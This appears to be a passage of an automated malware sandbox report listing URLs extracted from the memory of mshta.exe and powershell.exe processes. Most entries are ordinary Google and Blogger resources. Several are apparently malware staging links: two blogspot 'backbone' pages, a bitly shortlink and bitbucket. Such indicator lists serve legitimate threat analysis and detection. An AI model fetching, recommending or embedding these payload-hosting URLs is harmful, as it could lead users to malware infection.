Source: mshta.exe, 0000001B.00000002.562081398.00000215A3EC2000.00000004.00000001.sdmp, mshta.exe, 0000001B.00000002.574511521.00000215A608E000.00000004.00000001.sdmp, mshta.exe, 0000001B.00000002.601847989.00000215A8BC6000.00000004.00000001.sdmp, mshta.exe, 0000001B.00000002.560048090.00000215A3E56000.00000004.00000001.sdmp, mshta.exe, 0000001B.00000002.559609483.00000215A3E29000.00000004.00000001.sdmp, mshta.exe, 0000001B.00000002.574984835.00000215A60C3000.00000004.00000001.sdmp String found in binary or memory: https://backbones1234511a.blogspot.com/feeds/posts/default
Source: mshta.exe, 0000001B.00000002.562081398.00000215A3EC2000.00000004.00000001.sdmp, mshta.exe, 0000001B.00000002.574511521.00000215A608E000.00000004.00000001.sdmp, mshta.exe, 0000001B.00000002.559609483.00000215A3E29000.00000004.00000001.sdmp, mshta.exe, 0000001B.00000002.574984835.00000215A60C3000.00000004.00000001.sdmp String found in binary or memory: https://backbones1234511a.blogspot.com/feeds/posts/default?alt
Source: mshta.exe, 0000001B.00000002.560048090.00000215A3E56000.00000004.00000001.sdmp String found in binary or memory: https://backbones1234511a.blogspot.com/feeds/posts/default?alt=rss
Source: mshta.exe, 0000001B.00000002.559609483.00000215A3E29000.00000004.00000001.sdmp String found in binary or memory: https://backbones1234511a.blogspot.com/feeds/posts/default?alt=rssR
Source: mshta.exe, 0000001B.00000002.540726226.0000020DA1429000.00000004.00000020.sdmp String found in binary or memory: https://backbones1234511a.blogspot.com/feeds/posts/defaultO
Source: mshta.exe, 0000001B.00000002.559609483.00000215A3E29000.00000004.00000001.sdmp String found in binary or memory: https://backbones1234511a.blogspot.com/feeds/posts/defaultX
Source: mshta.exe, 0000001B.00000002.602565559.00000215A8C00000.00000004.00000001.sdmp String found in binary or memory: https://backbones1234511a.blogspot.com/feeds/posts/defaultZ
Source: mshta.exe, 0000001B.00000002.601847989.00000215A8BC6000.00000004.00000001.sdmp String found in binary or memory: https://backbones1234511a.blogspot.com/feeds/posts/defaultbv_
Source: mshta.exe, 0000001B.00000002.542329360.0000020DA1463000.00000004.00000020.sdmp, mshta.exe, 0000001B.00000002.574511521.00000215A608E000.00000004.00000001.sdmp String found in binary or memory: https://backbones1234511a.blogspot.com/js/cookienotice.js
Source: mshta.exe, 0000001B.00000002.559609483.00000215A3E29000.00000004.00000001.sdmp String found in binary or memory: https://backbones1234511a.blogspot.com/js/cookienotice.js0
Source: mshta.exe, 0000001B.00000002.559609483.00000215A3E29000.00000004.00000001.sdmp String found in binary or memory: https://backbones1234511a.blogspot.com/js/cookienotice.js8
Source: mshta.exe, 0000001B.00000002.542329360.0000020DA1463000.00000004.00000020.sdmp String found in binary or memory: https://backbones1234511a.blogspot.com/js/cookienotice.jsG
Source: mshta.exe, 0000001B.00000002.559199361.00000215A3DF0000.00000004.00000001.sdmp String found in binary or memory: https://backbones1234511a.blogspot.com/js/cookienotice.jsogID=7680886694920034828&zx=ad70dca0-0e6f-4
Source: mshta.exe, 0000001B.00000002.559609483.00000215A3E29000.00000004.00000001.sdmp String found in binary or memory: https://backbones1234511a.blogspot.com/lass
Source: mshta.exe, 0000001B.00000002.559199361.00000215A3DF0000.00000004.00000001.sdmp, mshta.exe, 0000001B.00000002.579813740.00000215A6273000.00000004.00000001.sdmp, mshta.exe, 0000001B.00000002.601847989.00000215A8BC6000.00000004.00000001.sdmp, mshta.exe, 0000001B.00000002.574275130.00000215A6070000.00000004.00000001.sdmp, mshta.exe, 0000001B.00000002.623318608.00000215A961D000.00000004.00000001.sdmp, mshta.exe, 0000001B.00000002.559609483.00000215A3E29000.00000004.00000001.sdmp String found in binary or memory: https://backbones1234511a.blogspot.com/p/ayoolaback.html%22
Source: mshta.exe, 0000001B.00000002.559609483.00000215A3E29000.00000004.00000001.sdmp String found in binary or memory: https://backbones1234511a.blogspot.com/p/ayoolaback.html%22(
Source: mshta.exe, 0000001B.00000002.538001966.0000020DA13BB000.00000004.00000020.sdmp String found in binary or memory: https://backbones1234511a.blogspot.com/p/ayoolaback.html%22...DW
Source: mshta.exe, 0000001B.00000002.560048090.00000215A3E56000.00000004.00000001.sdmp String found in binary or memory: https://backbones1234511a.blogspot.com/p/ayoolaback.html%22.js2OL4
Source: mshta.exe, 0000001B.00000002.562081398.00000215A3EC2000.00000004.00000001.sdmp String found in binary or memory: https://backbones1234511a.blogspot.com/p/ayoolaback.html%229m
Source: mshta.exe, 0000001B.00000002.576518142.00000215A616B000.00000004.00000001.sdmp String found in binary or memory: https://backbones1234511a.blogspot.com/p/ayoolaback.html%22?interstitial=ABqL8_h2JWMGlPiHM8-D8RSUQjB
Source: mshta.exe, 00000026.00000003.478480069.000002632CBCC000.00000004.00000001.sdmp String found in binary or memory: https://backbones1234511a.blogspot.com/p/ayoolaback.html%22abbr
Source: mshta.exe, 0000001B.00000002.601847989.00000215A8BC6000.00000004.00000001.sdmp String found in binary or memory: https://backbones1234511a.blogspot.com/p/ayoolaback.html%22bw_
Source: mshta.exe, 0000001B.00000002.579813740.00000215A6273000.00000004.00000001.sdmp, mshta.exe, 00000026.00000002.574240914.000002632CA03000.00000004.00000001.sdmp String found in binary or memory: https://backbones1234511a.blogspot.com/p/ayoolaback.html%22https://www.blogger.com/static/v1/jsbin/4
Source: mshta.exe, 0000001B.00000002.538001966.0000020DA13BB000.00000004.00000020.sdmp String found in binary or memory: https://backbones1234511a.blogspot.com/p/ayoolaback.html%22laback.html%22e:
Source: mshta.exe, 0000001B.00000002.538001966.0000020DA13BB000.00000004.00000020.sdmp String found in binary or memory: https://backbones1234511a.blogspot.com/p/ayoolaback.html%22labackf8
Source: mshta.exe, 0000001B.00000002.574275130.00000215A6070000.00000004.00000001.sdmp String found in binary or memory: https://backbones1234511a.blogspot.com/p/ayoolaback.html%22o?
Source: mshta.exe, 0000001B.00000002.574275130.00000215A6070000.00000004.00000001.sdmp String found in binary or memory: https://backbones1234511a.blogspot.com/p/ayoolaback.html%22rif
Source: mshta.exe, 0000001B.00000002.536818867.0000020DA1394000.00000004.00000020.sdmp String found in binary or memory: https://backbones1234511a.blogspot.com/p/ayoolaback.html%22ry.IE5html%22
Source: mshta.exe, 0000001B.00000002.540726226.0000020DA1429000.00000004.00000020.sdmp String found in binary or memory: https://backbones1234511a.blogspot.com/p/ayoolaback.html%22w
Source: mshta.exe, 0000001B.00000002.559609483.00000215A3E29000.00000004.00000001.sdmp, mshta.exe, 00000026.00000002.603530510.000002632F78C000.00000004.00000001.sdmp String found in binary or memory: https://backbones1234511a.blogspot.com/p/ayoolaback.html%22x
Source: mshta.exe, 0000001B.00000002.562081398.00000215A3EC2000.00000004.00000001.sdmp String found in binary or memory: https://backbones1234511a.blogspot.com/p/ayoolaback.html%2522&type=blog
Source: mshta.exe, 0000001B.00000002.562081398.00000215A3EC2000.00000004.00000001.sdmp String found in binary or memory: https://backbones1234511a.blogspot.com/p/ayoolaback.html%2522&type=blog6q
Source: mshta.exe, 0000001B.00000002.561855853.00000215A3EB2000.00000004.00000001.sdmp String found in binary or memory: https://backbones1234511a.blogspot.com/p/ayoolaback.html%2522&type=blogP
Source: mshta.exe, 0000001B.00000002.559199361.00000215A3DF0000.00000004.00000001.sdmp String found in binary or memory: https://backbones1234511a.blogspot.com/p/ayoolaback.html%2522&type=blogc
Source: mshta.exe, 0000001B.00000002.559199361.00000215A3DF0000.00000004.00000001.sdmp String found in binary or memory: https://backbones1234511a.blogspot.com/p/ayoolaback.html%2522&type=blogy
Source: mshta.exe, 0000001B.00000002.576518142.00000215A616B000.00000004.00000001.sdmp String found in binary or memory: https://backbones1234511a.blogspot.com/pw
Source: mshta.exe, 0000001B.00000002.543112273.0000020DA147A000.00000004.00000020.sdmp, mshta.exe, 0000001B.00000002.562081398.00000215A3EC2000.00000004.00000001.sdmp, mshta.exe, 0000001B.00000002.574511521.00000215A608E000.00000004.00000001.sdmp, mshta.exe, 0000001B.00000002.559609483.00000215A3E29000.00000004.00000001.sdmp, mshta.exe, 0000001B.00000002.574984835.00000215A60C3000.00000004.00000001.sdmp String found in binary or memory: https://backbones1234511a.blogspot.com/search
Source: mshta.exe String found in binary or memory: https://bitbucket.or
Source: powershell.exe, 00000016.00000002.423706608.000001ACB4C30000.00000004.00000001.sdmp String found in binary or memory: https://bitbucket.org
Source: powershell.exe, 00000016.00000002.490688802.000001ACB6848000.00000004.00000001.sdmp String found in binary or memory: https://bitbucket.org/
Source: mshta.exe, 00000006.00000003.269888355.0000000002E93000.00000004.00000001.sdmp, mshta.exe, 00000006.00000002.421612039.0000000004F70000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.382069371.000000000A410000.00000004.00000001.sdmp String found in binary or memory: https://bitly.com/yuiwqhdsavbdjagh
Source: mshta.exe, 00000006.00000002.432405705.000000000A382000.00000004.00000001.sdmp String found in binary or memory: https://bitly.com/yuiwqhdsavbdjagh.
Source: mshta.exe, 00000006.00000002.419417741.0000000002ED0000.00000004.00000020.sdmp String found in binary or memory: https://bitly.com/yuiwqhdsavbdjaghC:
Source: mshta.exe, 00000006.00000003.269888355.0000000002E93000.00000004.00000001.sdmp String found in binary or memory: https://bitly.com/yuiwqhdsavbdjaghMar
Source: mshta.exe, 00000006.00000003.269888355.0000000002E93000.00000004.00000001.sdmp String found in binary or memory: https://bitly.com/yuiwqhdsavbdjaghQ
Source: mshta.exe, 00000006.00000002.419644409.0000000003360000.00000004.00000040.sdmp String found in binary or memory: https://bitly.com/yuiwqhdsavbdjaghVERr
Source: mshta.exe, 00000006.00000002.426851753.000000000678F000.00000004.00000001.sdmp String found in binary or memory: https://bitly.com/yuiwqhdsavbdjaghm
Source: mshta.exe, 0000001D.00000003.387444480.000001BEEAE96000.00000004.00000001.sdmp String found in binary or memory: https://books.google.co.uk/?hl=en-GB&tab=jp
Source: mshta.exe, 00000006.00000003.284394415.000000000A384000.00000004.00000001.sdmp String found in binary or memory: https://books.google.co.uk/?hl=en-GB&tab=jp5~x
Source: mshta.exe, 00000006.00000002.431863271.000000000A361000.00000004.00000001.sdmp, mshta.exe, 0000001D.00000003.387444480.000001BEEAE96000.00000004.00000001.sdmp String found in binary or memory: https://calendar.google.com/calendar?tab=jc
Source: mshta.exe, 00000006.00000003.284394415.000000000A384000.00000004.00000001.sdmp String found in binary or memory: https://calendar.google.com/calendar?tab=jca~
Source: mshta.exe, 0000001D.00000002.573620913.000001BEEAD3B000.00000004.00000001.sdmp String found in binary or memory: https://chat.google.com/
Source: mshta.exe, 00000006.00000003.284758278.00000000067F4000.00000004.00000001.sdmp String found in binary or memory: https://chat.google.com/lgOQ
Source: mshta.exe, 00000006.00000002.431863271.000000000A361000.00000004.00000001.sdmp String found in binary or memory: https://contacts.google.com/?hl=en-GB&taI
Source: mshta.exe, 00000006.00000003.284394415.000000000A384000.00000004.00000001.sdmp String found in binary or memory: https://contacts.google.com/?hl=en-GB&tab=jC
Source: mshta.exe, 0000001D.00000003.389017798.000001BEEADFE000.00000004.00000001.sdmp String found in binary or memory: https://contacts.google.com/?hl=en-GB&tab=jCger.com;
Source: powershell.exe, 00000016.00000002.501338315.000001ACC4A86000.00000004.00000001.sdmp String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000016.00000002.501338315.000001ACC4A86000.00000004.00000001.sdmp String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000016.00000002.501338315.000001ACC4A86000.00000004.00000001.sdmp String found in binary or memory: https://contoso.com/License
Source: mshta.exe, 00000006.00000003.308074680.000000000E06B000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.271983439.00000000067D5000.00000004.00000001.sdmp, mshta.exe, 0000001D.00000003.386990795.000001BEEAE20000.00000004.00000001.sdmp String found in binary or memory: https://csi.gstatic.com/csi
Source: mshta.exe, 0000001D.00000003.387672537.000001BEEAD37000.00000004.00000001.sdmp, mshta.exe, 00000021.00000002.574438188.0000021CF46CA000.00000004.00000001.sdmp String found in binary or memory: https://csp.withgoogle.com/csp/apps-themes
Source: mshta.exe, 00000006.00000003.277113466.000000000A380000.00000004.00000001.sdmp, mshta.exe, 0000001B.00000002.529759929.0000004D382FB000.00000004.00000001.sdmp, mshta.exe, 0000001D.00000002.537059135.000001B6E5E4B000.00000004.00000020.sdmp, mshta.exe, 00000021.00000002.529475810.0000009CCDBFB000.00000004.00000001.sdmp, mshta.exe, 00000021.00000002.557329794.0000021CF236A000.00000004.00000001.sdmp String found in binary or memory: https://csp.withgoogle.com/csp/blogger-tech
Source: mshta.exe, 00000021.00000002.557329794.0000021CF236A000.00000004.00000001.sdmp String found in binary or memory: https://csp.withgoogle.com/csp/report
Source: mshta.exe, 00000006.00000003.285259818.000000000A390000.00000004.00000001.sdmp, mshta.exe, 0000001B.00000002.542053098.0000020DA145B000.00000004.00000020.sdmp, mshta.exe, 00000021.00000002.574438188.0000021CF46CA000.00000004.00000001.sdmp String found in binary or memory: https://csp.withgoogle.com/csp/report-to/apps-themes
Source: mshta.exe, 0000001B.00000002.576518142.00000215A616B000.00000004.00000001.sdmp String found in binary or memory: https://csp.withgoogle.com/csp/report-to/blogger-te
Source: mshta.exe, 00000006.00000003.277113466.000000000A380000.00000004.00000001.sdmp, mshta.exe, 0000001B.00000002.597026970.00000215A89CC000.00000004.00000001.sdmp, mshta.exe, 0000001D.00000002.537059135.000001B6E5E4B000.00000004.00000020.sdmp, mshta.exe, 00000021.00000002.529475810.0000009CCDBFB000.00000004.00000001.sdmp String found in binary or memory: https://csp.withgoogle.com/csp/report-to/blogger-tech
Source: mshta.exe, 00000006.00000003.276779788.000000000A3AF000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.276988976.000000000A39A000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.277065858.000000000A36B000.00000004.00000001.sdmp, mshta.exe, 0000001B.00000002.601173634.00000215A8B34000.00000004.00000001.sdmp, mshta.exe, 00000021.00000002.537342288.00000214EFFEC000.00000004.00000020.sdmp String found in binary or memory: https://csp.withgoogle.com/csp/report-to/static-on-bigtable
Source: powershell.exe, 00000016.00000002.505010455.000001ACC4FE9000.00000004.00000001.sdmp String found in binary or memory: https://d301sr5gafysq2.cloudfront.net;
Source: mshta.exe, 00000006.00000003.284394415.000000000A384000.00000004.00000001.sdmp String found in binary or memory: https://docs.google.com/document/?usp=docs_alcSyH
Source: mshta.exe, 0000001D.00000003.387672537.000001BEEAD37000.00000004.00000001.sdmp String found in binary or memory: https://docs.google.com/document/?usp=docs_alcnal
Source: mshta.exe, 00000021.00000002.574848844.0000021CF46F2000.00000004.00000001.sdmp String found in binary or memory: https://docs.google.com/forms/?usp=forms_alc
Source: mshta.exe, 0000001D.00000003.387444480.000001BEEAE96000.00000004.00000001.sdmp String found in binary or memory: https://docs.google.com/presentation/?usp=slides_alc7vD
Source: mshta.exe, 00000006.00000002.433660449.000000000A473000.00000004.00000001.sdmp String found in binary or memory: https://docs.google.com/presentation/?usp=slides_alcMX
Source: mshta.exe, 00000006.00000002.433660449.000000000A473000.00000004.00000001.sdmp, mshta.exe, 0000001D.00000003.387444480.000001BEEAE96000.00000004.00000001.sdmp String found in binary or memory: https://docs.google.com/spreadsheets/?usp=sheets_alc
Source: mshta.exe, 00000006.00000002.431863271.000000000A361000.00000004.00000001.sdmp, mshta.exe, 0000001D.00000003.386990795.000001BEEAE20000.00000004.00000001.sdmp String found in binary or memory: https://drive.google.com/?tab=jo
Source: mshta.exe, 00000006.00000003.308884213.00000000067CA000.00000004.00000001.sdmp String found in binary or memory: https://drive.google.com/?tab=joj
Source: mshta.exe, 00000006.00000003.308884213.00000000067CA000.00000004.00000001.sdmp, mshta.exe, 0000001D.00000003.386990795.000001BEEAE20000.00000004.00000001.sdmp String found in binary or memory: https://duo.google.com/?usp=duo_ald
Source: mshta.exe, 00000006.00000002.431863271.000000000A361000.00000004.00000001.sdmp, mshta.exe, 0000001D.00000003.386990795.000001BEEAE20000.00000004.00000001.sdmp, mshta.exe, 0000001D.00000003.385776898.000001BEED3A1000.00000004.00000001.sdmp String found in binary or memory: https://earth.google.com/web/
Source: mshta.exe, 00000006.00000003.401937493.000000000A345000.00000004.00000001.sdmp, mshta.exe, 0000001D.00000002.574780077.000001BEEADC0000.00000004.00000001.sdmp String found in binary or memory: https://fonts.google.com/license/googlerestricted
Source: mshta.exe, 00000021.00000002.574848844.0000021CF46F2000.00000004.00000001.sdmp String found in binary or memory: https://fonts.googleapis.com/
Source: mshta.exe, 00000021.00000002.555056773.0000021CF22D2000.00000004.00000001.sdmp, mshta.exe, 00000021.00000002.554636207.0000021CF22A7000.00000004.00000001.sdmp, mshta.exe, 00000021.00000002.536287694.00000214EFFBD000.00000004.00000020.sdmp, mshta.exe, 00000021.00000002.574848844.0000021CF46F2000.00000004.00000001.sdmp String found in binary or memory: https://fonts.googleapis.com/css?family=Open
Source: mshta.exe, 00000021.00000002.574848844.0000021CF46F2000.00000004.00000001.sdmp String found in binary or memory: https://fonts.googleapis.com/css?lang=en-GB&family=Product
Source: mshta.exe, 00000021.00000002.539674969.00000214F0045000.00000004.00000020.sdmp String found in binary or memory: https://fonts.googleapis.com/ss?family=Open
Source: mshta.exe, 00000006.00000002.432405705.000000000A382000.00000004.00000001.sdmp, mshta.exe, 0000001B.00000002.576518142.00000215A616B000.00000004.00000001.sdmp, mshta.exe, 00000021.00000002.574848844.0000021CF46F2000.00000004.00000001.sdmp String found in binary or memory: https://fonts.gstatic.com/
Source: mshta.exe, 00000021.00000002.574848844.0000021CF46F2000.00000004.00000001.sdmp String found in binary or memory: https://fonts.gstatic.com/(Q
Source: mshta.exe, 0000001D.00000002.559507739.000001BEE8AEB000.00000004.00000001.sdmp String found in binary or memory: https://fonts.gstatic.com/BX
Source: mshta.exe, 00000006.00000002.432405705.000000000A382000.00000004.00000001.sdmp String found in binary or memory: https://fonts.gstatic.com/N
Source: mshta.exe, 0000001D.00000002.559507739.000001BEE8AEB000.00000004.00000001.sdmp String found in binary or memory: https://fonts.gstatic.com/fX/EsQ
Source: mshta.exe, 00000006.00000002.427422063.00000000067CA000.00000004.00000001.sdmp, mshta.exe, 0000001B.00000002.574511521.00000215A608E000.00000004.00000001.sdmp, mshta.exe, 0000001D.00000003.388235434.000001BEEAD1F000.00000004.00000001.sdmp, mshta.exe, 00000021.00000002.598269761.0000021CF6C4D000.00000004.00000001.sdmp String found in binary or memory: https://fonts.gstatic.com/s/materialiconsextended/v109/kJEjBvgX7BgnkSrUwT8UnLVc38YydejYY-oE_LvN.eot
Source: mshta.exe, 00000021.00000002.598269761.0000021CF6C4D000.00000004.00000001.sdmp String found in binary or memory: https://fonts.gstatic.com/s/materialiconsextended/v109/kJEjBvgX7BgnkSrUwT8UnLVc38YydejYY-oE_LvN.eotC
Source: mshta.exe, 00000006.00000002.426000725.0000000006700000.00000004.00000001.sdmp, mshta.exe, 0000001B.00000002.579246594.00000215A6245000.00000004.00000001.sdmp, mshta.exe, 0000001D.00000002.570889400.000001BEEACB0000.00000004.00000001.sdmp, mshta.exe, 00000021.00000002.571480214.0000021CF4610000.00000004.00000001.sdmp String found in binary or memory: https://fonts.gstatic.com/s/opensans/v23/mem5YaGs126MiZpBA-UN_r8OUuht.eot
Source: mshta.exe, 00000006.00000003.277027798.000000000A3AC000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.308477743.000000000A32D000.00000004.00000001.sdmp, mshta.exe, 0000001B.00000002.574511521.00000215A608E000.00000004.00000001.sdmp, mshta.exe, 0000001D.00000002.558969425.000001BEE8A66000.00000004.00000001.sdmp, mshta.exe, 00000021.00000002.536287694.00000214EFFBD000.00000004.00000020.sdmp String found in binary or memory: https://fonts.gstatic.com/s/opensans/v23/mem5YaGs126MiZpBA-UN_r8OUuht.eot);
Source: mshta.exe, 00000006.00000002.426000725.0000000006700000.00000004.00000001.sdmp String found in binary or memory: https://fonts.gstatic.com/s/opensans/v23/mem5YaGs126MiZpBA-UN_r8OUuht.eot2
Source: mshta.exe, 0000001B.00000002.579246594.00000215A6245000.00000004.00000001.sdmp, mshta.exe, 0000001D.00000003.389513364.000001BEEAD69000.00000004.00000001.sdmp, mshta.exe, 00000021.00000002.571480214.0000021CF4610000.00000004.00000001.sdmp String found in binary or memory: https://fonts.gstatic.com/s/opensans/v23/mem5YaGs126MiZpBA-UN_r8OUuht.eotC:
Source: mshta.exe, 00000021.00000002.571480214.0000021CF4610000.00000004.00000001.sdmp String found in binary or memory: https://fonts.gstatic.com/s/opensans/v23/mem5YaGs126MiZpBA-UN_r8OUuht.eotI
Source: mshta.exe, 00000021.00000002.574033424.0000021CF46A0000.00000004.00000001.sdmp String found in binary or memory: https://fonts.gstatic.com/s/opensans/v23/mem5YaGs126MiZpBA-UN_r8OUuht.eoter-AgentMozilla/4.0
Source: mshta.exe, 00000006.00000002.431162379.000000000A337000.00000004.00000001.sdmp String found in binary or memory: https://fonts.gstatic.com/s/opensans/v23/mem5YaGs126MiZpBA-UN_r8OUuht.eotghLMEM
Source: mshta.exe, 0000001B.00000002.559199361.00000215A3DF0000.00000004.00000001.sdmp String found in binary or memory: https://fonts.gstatic.com/s/opensans/v23/mem5YaGs126MiZpBA-UN_r8OUuht.eotgspot.com/p/ayoolaback.html
Source: mshta.exe, 00000021.00000002.539674969.00000214F0045000.00000004.00000020.sdmp String found in binary or memory: https://fonts.gstatic.com/s/opensans/v23/mem5YaGs126MiZpBA-UN_r8OUuht.eotss
Source: mshta.exe, 0000001D.00000003.389017798.000001BEEADFE000.00000004.00000001.sdmp String found in binary or memory: https://fonts.gstatic.com/s/productsans/v13/pxiDypQkot1TnFhsFMOfGShVF9eK.eot
Source: mshta.exe, 00000006.00000003.401937493.000000000A345000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.383803015.000000000A2FF000.00000004.00000001.sdmp, mshta.exe, 0000001D.00000002.574780077.000001BEEADC0000.00000004.00000001.sdmp, mshta.exe, 0000001D.00000003.389884952.000001BEEAD0D000.00000004.00000001.sdmp String found in binary or memory: https://fonts.gstatic.com/s/productsans/v13/pxiDypQkot1TnFhsFMOfGShVF9eK.eot);
Source: mshta.exe, 00000006.00000003.389899545.0000000006774000.00000004.00000001.sdmp String found in binary or memory: https://fonts.gstatic.com/s/productsans/v13/pxiDypQkot1TnFhsFMOfGShVF9eK.eot);ica
Source: mshta.exe, 0000001D.00000003.388235434.000001BEEAD1F000.00000004.00000001.sdmp String found in binary or memory: https://fonts.gstatic.com/s/productsans/v13/pxiDypQkot1TnFhsFMOfGShVF9eK.eot);ry)
Source: mshta.exe, 00000006.00000003.400562039.00000000067A4000.00000004.00000001.sdmp String found in binary or memory: https://fonts.gstatic.com/s/productsans/v13/pxiDypQkot1TnFhsFMOfGShVF9eK.eot;
Source: mshta.exe, 00000006.00000003.400562039.00000000067A4000.00000004.00000001.sdmp String found in binary or memory: https://fonts.gstatic.com/s/productsans/v13/pxiDypQkot1TnFhsFMOfGShVF9eK.eotR
Source: mshta.exe, 0000001D.00000003.389017798.000001BEEADFE000.00000004.00000001.sdmp String found in binary or memory: https://fonts.gstatic.com/s/productsans/v13/pxiDypQkot1TnFhsFMOfGShVF9eK.eotp
Source: mshta.exe, 00000006.00000003.308074680.000000000E06B000.00000004.00000001.sdmp, mshta.exe, 0000001D.00000003.386990795.000001BEEAE20000.00000004.00000001.sdmp String found in binary or memory: https://resources.blogblog.com/img/widgets/icon_contactform_cross.gif
Source: mshta.exe, 0000001D.00000002.558969425.000001BEE8A66000.00000004.00000001.sdmp, mshta.exe, 00000021.00000002.556709892.0000021CF233E000.00000004.00000001.sdmp, mshta.exe, 00000021.00000002.555056773.0000021CF22D2000.00000004.00000001.sdmp String found in binary or memory: https://resources.blogblog.com/img/widgets/s_bottom.png
Source: mshta.exe, 00000006.00000003.311624206.0000000008BB3000.00000004.00000001.sdmp, mshta.exe, 00000006.00000002.426851753.000000000678F000.00000004.00000001.sdmp, mshta.exe, 0000001B.00000002.559609483.00000215A3E29000.00000004.00000001.sdmp, mshta.exe, 0000001D.00000002.558969425.000001BEE8A66000.00000004.00000001.sdmp, mshta.exe, 00000021.00000002.539674969.00000214F0045000.00000004.00000020.sdmp String found in binary or memory: https://resources.blogblog.com/img/widgets/s_bottom.png)
Source: mshta.exe, 0000001D.00000002.558969425.000001BEE8A66000.00000004.00000001.sdmp, mshta.exe, 00000021.00000002.555056773.0000021CF22D2000.00000004.00000001.sdmp, mshta.exe, 00000021.00000002.540620819.00000214F0066000.00000004.00000020.sdmp String found in binary or memory: https://resources.blogblog.com/img/widgets/s_top.png
Source: mshta.exe, 0000001D.00000002.558969425.000001BEE8A66000.00000004.00000001.sdmp, mshta.exe, 00000021.00000002.539674969.00000214F0045000.00000004.00000020.sdmp String found in binary or memory: https://resources.blogblog.com/img/widgets/s_top.png)
Source: mshta.exe, 00000006.00000003.389899545.0000000006774000.00000004.00000001.sdmp, mshta.exe, 0000001B.00000002.542329360.0000020DA1463000.00000004.00000020.sdmp, mshta.exe, 0000001B.00000002.574984835.00000215A60C3000.00000004.00000001.sdmp, mshta.exe, 0000001D.00000002.559632238.000001BEE8B06000.00000004.00000001.sdmp, mshta.exe, 0000001D.00000003.388235434.000001BEEAD1F000.00000004.00000001.sdmp, mshta.exe, 00000021.00000002.540176025.00000214F0058000.00000004.00000020.sdmp, mshta.exe, 00000021.00000002.556350637.0000021CF2327000.00000004.00000001.sdmp, mshta.exe, 00000021.00000002.571480214.0000021CF4610000.00000004.00000001.sdmp String found in binary or memory: https://s.ytimg.com
Source: mshta.exe, 00000021.00000002.574848844.0000021CF46F2000.00000004.00000001.sdmp String found in binary or memory: https://stadia.google.com/
Source: mshta.exe, 00000006.00000003.284758278.00000000067F4000.00000004.00000001.sdmp String found in binary or memory: https://stadia.google.com/?Q
Source: mshta.exe, 0000001D.00000002.559507739.000001BEE8AEB000.00000004.00000001.sdmp String found in binary or memory: https://startthepartyup.blogspot.com/
Source: mshta.exe, 0000001D.00000002.559507739.000001BEE8AEB000.00000004.00000001.sdmp String found in binary or memory: https://startthepartyup.blogspot.com//p/backbone16.html%22
Source: mshta.exe, 0000001D.00000003.387444480.000001BEEAE96000.00000004.00000001.sdmp String found in binary or memory: https://startthepartyup.blogspot.com/R
Source: mshta.exe, 0000001D.00000002.558969425.000001BEE8A66000.00000004.00000001.sdmp, mshta.exe, 0000001D.00000002.571074707.000001BEEACBC000.00000004.00000001.sdmp, mshta.exe, 0000001D.00000002.559507739.000001BEE8AEB000.00000004.00000001.sdmp String found in binary or memory: https://startthepartyup.blogspot.com/favicon.ico
Source: mshta.exe, 0000001D.00000002.558643869.000001BEE8A30000.00000004.00000001.sdmp String found in binary or memory: https://startthepartyup.blogspot.com/favicon.icong
Source: mshta.exe, 0000001D.00000002.559507739.000001BEE8AEB000.00000004.00000001.sdmp String found in binary or memory: https://startthepartyup.blogspot.com/feeds/posts/default
Source: mshta.exe, 0000001D.00000002.559507739.000001BEE8AEB000.00000004.00000001.sdmp String found in binary or memory: https://startthepartyup.blogspot.com/feeds/posts/default?alt
Source: mshta.exe, 0000001D.00000002.558969425.000001BEE8A66000.00000004.00000001.sdmp String found in binary or memory: https://startthepartyup.blogspot.com/feeds/posts/default?alt=rss
Source: mshta.exe, 0000001D.00000002.558643869.000001BEE8A30000.00000004.00000001.sdmp String found in binary or memory: https://startthepartyup.blogspot.com/feeds/posts/default?alt=rssy
Source: mshta.exe, 0000001D.00000002.570889400.000001BEEACB0000.00000004.00000001.sdmp String found in binary or memory: https://startthepartyup.blogspot.com/feeds/posts/defaultp
Source: mshta.exe, 0000001D.00000003.389017798.000001BEEADFE000.00000004.00000001.sdmp String found in binary or memory: https://startthepartyup.blogspot.com/feeds/posts/defaultq
Source: mshta.exe, 0000001D.00000003.387444480.000001BEEAE96000.00000004.00000001.sdmp String found in binary or memory: https://startthepartyup.blogspot.com/g
Source: mshta.exe, 0000001D.00000003.387444480.000001BEEAE96000.00000004.00000001.sdmp String found in binary or memory: https://startthepartyup.blogspot.com/h
Source: mshta.exe, 0000001D.00000002.570889400.000001BEEACB0000.00000004.00000001.sdmp, mshta.exe, 0000001D.00000002.541490035.000001B6E5EFA000.00000004.00000020.sdmp String found in binary or memory: https://startthepartyup.blogspot.com/js/cookienotice.js
Source: mshta.exe, 0000001D.00000002.558969425.000001BEE8A66000.00000004.00000001.sdmp String found in binary or memory: https://startthepartyup.blogspot.com/js/cookienotice.js0
Source: mshta.exe, 0000001D.00000002.558969425.000001BEE8A66000.00000004.00000001.sdmp String found in binary or memory: https://startthepartyup.blogspot.com/js/cookienotice.js8
Source: mshta.exe, 0000001D.00000002.558969425.000001BEE8A66000.00000004.00000001.sdmp String found in binary or memory: https://startthepartyup.blogspot.com/js/cookienotice.jsBlogID=9027821174359424672&zx=2c5db057-0ce4-4
Source: mshta.exe, 0000001D.00000002.541490035.000001B6E5EFA000.00000004.00000020.sdmp String found in binary or memory: https://startthepartyup.blogspot.com/js/cookienotice.jsC:
Source: mshta.exe, 0000001D.00000002.558969425.000001BEE8A66000.00000004.00000001.sdmp String found in binary or memory: https://startthepartyup.blogspot.com/js/cookienotice.jsx
Source: mshta.exe String found in binary or memory: https://startthepartyup.blogspot.com/p/backb
Source: mshta.exe, 0000001D.00000002.534593772.000001B6E5E10000.00000004.00000020.sdmp String found in binary or memory: https://startthepartyup.blogspot.com/p/backbone16.html
Source: mshta.exe, 0000001D.00000002.537059135.000001B6E5E4B000.00000004.00000020.sdmp String found in binary or memory: https://startthepartyup.blogspot.com/p/backbone16.html%22
Source: mshta.exe, 0000001D.00000002.537059135.000001B6E5E4B000.00000004.00000020.sdmp String found in binary or memory: https://startthepartyup.blogspot.com/p/backbone16.html%22...
